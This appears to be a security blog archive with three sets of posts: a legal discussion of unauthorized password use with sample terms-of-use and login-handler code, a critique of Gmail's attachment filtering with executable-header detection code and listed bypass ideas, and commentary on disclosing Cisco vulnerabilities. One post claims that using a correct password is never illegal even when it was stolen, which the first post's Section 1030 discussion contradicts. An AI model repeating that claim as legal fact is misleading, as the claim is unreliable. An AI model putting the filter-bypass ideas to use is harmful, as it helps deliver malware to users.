Instead, Egilman chose to label the misuse of the password as circumvention of a protective measure intended to protect copyrighted works shielded from public access by the site’s simple password authentication system. Though the merits of password authentication are another debate for another day, the question I was asking at this point is why in the world Egilman chose to pursue the crime as a DMCA violation.

In this case, it appears Egilman chose this avenue of prosecution because the malicious user was actually authorized for the purposes of Section 1030.

For many sites, a mere username and password pairing authorizes you to access protected portions of a site’s content. Some blog hosts, for instance, require nothing more than a valid e-mail address to set up an account, after which a simple username and password suffices for access to that account. Many content providers include no mention (not even in their lengthy Terms of Use agreements, that nobody reads but me) that using an account you did not create is an unauthorized use of the services that site provides.

In such cases, unauthorized means of obtaining a password (exploitation of software flaws, brute-force cracking attempts, etc.) are obviously illegal under Section 1030. The more murky legal territory surrounds cases where an attacker possesses a valid (authorized) set of credentials via some other means, in spite of not being the authorized user. This could even include cases where the attacker was informed of the credentials by a user who had obtained them illegally. This is true because Section 1030 requires an attacker to “intentionally access a computer without authorization or exceed authorized access” or to “knowingly access a protected computer without authorization” before a crime has been committed. Computer crime laws in most other nations have similar standards of criminal conduct (i.e., the prosecuting plaintiff must prove intent).

In the case of someone who had illegally acquired a password revealing it to an attacker-to-be, the leaker would face conviction under paragraph six (language that is, again, modeled in most of the developed world), but the attacker who used the stolen password could conceivably argue ignorance by claiming that he/she had no idea the access was unauthorized.

Further, a defendant charged under paragraph six could make a compelling argument that because accessing an account created by another user is not unauthorized according to the TOU (provided the credentials are otherwise lawfully obtained — an exercise to the reader) a crime has not been committed.

As a security professional, I understand that access to be unauthorized, as do most in this field. However, the legal system doesn’t provide the grounds to prosecute an offender based solely on that assertion. That means a user who willingly reveals credentials may expose himself/herself to damage and you to lost hours, without leaving you any legal recourse. In a world where people still cough up the goods to random strangers in return for candy bars and coffee, that’s an unacceptably high risk.

But don’t panic… the legal system doesn’t force you to accept the costs of moronic users. It only offers you the opportunity to do so if you don’t cover all your bases. The solution to this potential legal pitfall (and the way to avoid being caught in Egilman’s situation) is to ensure that all users who could potentially be asked to authenticate themselves are aware that logging in with a set of credentials is a testimony by the user that they own the account those credentials correspond to, as well as the credentials themselves. It won’t deter criminals, just make them easier to nab if they strike.

At the very least, Terms of Use agreements should be updated to include terms similar to the following:

You agree that you will not disclose your [insert site] account name or password to anyone under any circumstances. You agree to notify [insert site] as expeditiously as possible if you believe that your account details have been compromised. Willful disclosure of account information to a third party may result in the termination of your account at our discretion.

Use of [insert site] user identities not created by you for your personal use is not authorized by [insert site] and is a violation of these terms of use.

This absolves sites of the responsibility to deal with passwords that have been disclosed voluntarily (stolen passwords are another story) by defining that to be prohibited conduct in violation of the TOU. Further, a TOU agreement amended in this fashion also defines use of another user’s credentials to be a violation of the TOU, and specifically unauthorized.

Problem solved, right? Wrong.

Most providers only require a TOU to be read as a precondition of creating an account, with the assumption being that creating an account is a prerequisite to utilizing services. This perceived dependency, in reality, may not exist in a case such as this. Therefore, concern could arise as to whether the TOU is binding upon a person who logs in with another user’s credentials, as this person was never asked to read the TOU.

The solution to this problem? Require agreement to the TOU to log in. This can be in the form of a checkbox, text in the realm used for HTTP authentication, or say… a line or two of text between the input fields and the submit button on a login form:

Logging into this site indicates your agreement to use the services provided according to our terms of use. For more information, please read the agreement [link].

Finally… problem solved. For today. Legal issues are boring, and I’m no superstar lawyer, but not addressing this one could lead to pain down the road… even for non-legal folk.
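One way to put the above into practice in the login step itself, as an added example that is not code from the original post: the handler refuses to authenticate unless the submitted form carries the terms-of-use acceptance, and it records the acceptance (TOU version, account, source address, timestamp) with every attempt, so the site can later show that whoever logged in was told that using someone else’s account is unauthorized. The form field names, the TOU version string, the sample user store and the helper names are assumptions made for the example.

```python
"""Login handling that makes the terms-of-use (TOU) notice part of the
authentication step. Added example, not code from the original post; field
names, TOU_VERSION and the sample user store are assumptions."""
import hashlib
import hmac
import os
from datetime import datetime, timezone

TOU_VERSION = "2005-12-v1"  # assumed identifier for the TOU text in force
TOU_NOTICE = ("Logging into this site indicates your agreement to use the "
              "services provided according to our terms of use.")


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2-HMAC-SHA256; the iteration count is an example value."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


# Constructed sample user store: one account, password "correct horse".
_SALT = os.urandom(16)
USERS = {"alice": {"salt": _SALT, "hash": hash_password("correct horse", _SALT)}}

AUDIT_LOG = []  # in-memory stand-in for an append-only audit log


def process_login(form: dict, remote_addr: str) -> dict:
    """Return {"ok": bool, "reason": str}.

    Every attempt, accepted or refused, is logged together with the TOU
    version shown and whether the user accepted it."""
    username = form.get("username", "")
    password = form.get("password", "")
    accepted = form.get("tou_accept") == "on"
    event = {
        "ts": datetime.now(timezone.utc).isoformat(),
        "user": username,
        "addr": remote_addr,
        "tou_version": TOU_VERSION,
        "tou_accepted": accepted,
    }
    if not accepted:
        # No acceptance, no authentication: the TOU is a precondition of
        # logging in, not only of creating an account.
        event["result"] = "refused_no_tou"
        AUDIT_LOG.append(event)
        return {"ok": False, "reason": "terms of use not accepted"}

    record = USERS.get(username)
    # Hash against a dummy salt when the user is unknown so response timing
    # does not reveal which usernames exist.
    salt = record["salt"] if record else b"\x00" * 16
    expected = record["hash"] if record else hash_password("", salt)
    good = record is not None and hmac.compare_digest(
        hash_password(password, salt), expected)
    event["result"] = "success" if good else "bad_credentials"
    AUDIT_LOG.append(event)
    return {"ok": good, "reason": "" if good else "invalid username or password"}


def login_form_html() -> str:
    """The HTML-form variant: notice between the inputs and the submit
    button, plus a required checkbox."""
    return f"""<form method="post" action="/login">
  <label>Username <input name="username"></label>
  <label>Password <input name="password" type="password"></label>
  <p>{TOU_NOTICE} For more information, please read
     <a href="/terms">the agreement</a>.</p>
  <label><input type="checkbox" name="tou_accept" required> I agree</label>
  <button type="submit">Log in</button>
</form>"""


def basic_auth_challenge() -> str:
    """The HTTP Basic variant: put the notice in the realm string so the
    browser shows it in the credential prompt. Returns the value of the
    WWW-Authenticate header (quotes inside the realm are escaped)."""
    realm = TOU_NOTICE.replace('"', '\\"')
    return f'Basic realm="{realm}", charset="UTF-8"'
```

The checkbox on the form is enforced server-side, not only by the `required` attribute, since a client can submit the form without rendering it. The audit record is what matters in the scenario the post describes: it ties a specific TOU version to the login event for the account that was used.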


Scattered Passwords

A federal court recently ruled that using user names and passwords that do not belong to you is not an illegal act according to the Digital Millennium Copyright Act (“DMCA”).

InternetCases.com reports:

Plaintiff Egilman maintained a website that was only available to visitors who entered a correct username and password. He had employed such measures so that only certain people (e.g., his students) would have access. Egilman alleged that, without authorization, the defendants obtained the correct username and password combination, and subsequently gained “improper and illegal” access to the site.

The federal court has made the following statement:

the DMCA and the anti-circumvention provision at issue do not target the unauthorized use of a password intentionally issued by plaintiff to another entity

and:

It was irrelevant who provided the username/password combination to the defendant.

So the bottom line is: If someone is using the correct user name and password on a technical device, they are not breaking the law, even if they got the password illegally.

Resources:
Federal Court decision (pdf)
InternetCases.com


Thinking Different III

The following Thinking Different mini-column takes the title literally.
Recently I wrote about a Google vulnerability, and while my main theme was the lack of ability to publish a security issue to Google, the comments were “but this is not exploitable”.

Well, let’s put aside for a minute the obvious fact that I actually must convince the user to rename the file to .EXE, and let’s think about some advisories we already know about.
Hmmm… Does code execution on Internet Explorer when changing the extension of an .EXE to .JPG ring a bell?
Or maybe using Gmail as a storage facility (hey, someone wrote a “daemon” that converts Gmail to NFS!).
I can also use another program that will convert the extension for me…
I can also create a .BAT file that will “extract” from itself the .EXE and execute it…
And of course the list goes on.

So why Thinking Different? Because perhaps I cannot (yet) cause the user to execute the .EXE file just by sending an extensionless file, but I just enumerated 4 ways to exploit the situation if that ever happens.

So, I’m thinking that Gmail should either remove this unnecessary check, or add better checking, such as checking whether the content of a file contains a PE executable header.

Actually, why stop with Microsoft Windows executables, when there are COFF (usually Linux ELF) and other execution headers out there? Just because I choose to use Linux doesn’t mean I care less about the security of my machine…
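The content check the column asks for, as an added example (not Gmail’s code and not the author’s): it classifies an attachment by what the bytes say rather than by the file name, recognizing Windows PE images (an “MZ” stub whose e_lfanew field points at a “PE\0\0” signature), ELF and Mach-O headers, and, to cover the “.BAT that extracts an .EXE from itself” case mentioned above, a PE image embedded anywhere in the body. The sample inputs are constructed; the helper names are mine.

```python
"""Content-based executable detection instead of an extension check.
Added example, not code from the original post or from Gmail; SAMPLES are
constructed test inputs."""
import struct

ELF_MAGIC = b"\x7fELF"
# Mach-O magics, both byte orders; the fat/universal magic 0xcafebabe is
# shared with Java class files, so in production confirm with the header.
MACHO_MAGICS = {b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",   # 32-bit
                b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",   # 64-bit
                b"\xca\xfe\xba\xbe"}                        # fat binary


def pe_header_at(data: bytes, off: int) -> bool:
    """True if a DOS 'MZ' stub at `off` points, via the e_lfanew field at
    stub offset 0x3c, to a 'PE\\0\\0' signature inside the buffer."""
    if data[off:off + 2] != b"MZ" or len(data) < off + 0x40:
        return False
    e_lfanew = struct.unpack_from("<I", data, off + 0x3c)[0]
    pe_off = off + e_lfanew
    return data[pe_off:pe_off + 4] == b"PE\x00\x00"


def classify(data: bytes) -> set:
    """Return the set of executable formats found in `data`."""
    kinds = set()
    if pe_header_at(data, 0):
        kinds.add("pe")
    if data[:4] == ELF_MAGIC:
        kinds.add("elf")
    if data[:4] in MACHO_MAGICS:
        kinds.add("macho")
    # A PE image dropped inside another file (the self-extracting .BAT
    # trick): look for a valid PE header at any later offset.
    pos = data.find(b"MZ", 1)
    while pos != -1:
        if pe_header_at(data, pos):
            kinds.add("embedded-pe")
            break
        pos = data.find(b"MZ", pos + 1)
    return kinds


def is_executable(data: bytes) -> bool:
    """Decision used by the upload filter; the file name plays no part."""
    return bool(classify(data))


def make_pe_stub() -> bytes:
    """Constructed sample: the smallest shape that satisfies pe_header_at
    (an MZ stub with e_lfanew = 0x80 followed by the PE signature)."""
    hdr = bytearray(0x80)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3c, 0x80)
    return bytes(hdr) + b"PE\x00\x00" + b"\x00" * 20


# Constructed attachments keyed by the name the sender chose.
SAMPLES = {
    "report.jpg": make_pe_stub(),                          # renamed .EXE
    "tool": ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 57,    # extensionless ELF
    "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 60,       # real JPEG
    "dropper.bat": b"@echo off\r\nrem payload follows\r\n" + make_pe_stub(),
    "notes.txt": b"MZ is also how a text file might start by accident",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:12s} {sorted(classify(body)) or 'not executable'}")
```

The `notes.txt` sample shows why the two magic bytes alone are not enough: it starts with “MZ” but has no e_lfanew pointer to a PE signature, so it is not flagged, while `report.jpg` and the extensionless ELF are caught whatever they are called.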


Payback for Ciscogate - new trend?

On the surface it seems that in recent weeks people have started going full-disclosure on Cisco, surprising them with vulnerability reports on Bugtraq and friends. I may be wrong and they may have known of these ahead of time… If I am, forgive me. It seems like “payback time” or “loss of faith” after “Ciscogate”.

This possible trend is more than just disturbing, it’s dangerous to us all when it comes to a company like Cisco… whether they “deserve” it or not is irrelevant. They represent most of the Internet’s infrastructure and that by itself is a problem.

Today when Microsoft truly /wants/ to work with researchers (even if sometimes they don’t act it), the main problem they face is that researchers simply don’t believe in them. They are used to hearing things like:
“This is not a vulnerability”
“Yes, we are already aware of that” (=and that is why you won’t get credit)
And many other responses, although sometimes people don’t even get a response.

Myself, I never had such problems with Microsoft and found them very responsive and serious in their replies… at least in recent years… but that’s just my personal experience and that doesn’t count. :)

With Cisco, it can get worse. Researchers may fear that if they do get a response (or work with PSIRT) it will be with some sort of legal document or a search warrant. Still, Cisco is responsive, and I don’t much like full disclosure in cases where companies actually handle reports and give due credit to researchers.

I suppose only time will tell where this will end, but it seems that, much as predicted by Mike Lynn, Raven Alder and myself, exploits against Cisco are going to become a very serious concern in the near future for the infrastructure.

I believe people should give Cisco PSIRT a *chance* before going public with vulnerabilities… but if they don’t I suppose Cisco and everyone else learned a valuable lesson.

What that lesson may be is a whole different blog entry. Not many had a grudge against Cisco before Ciscogate… and lost faith is very difficult to recover.

Gadi Evron,
ge@linuxbox.org.


Vulnerability Scanner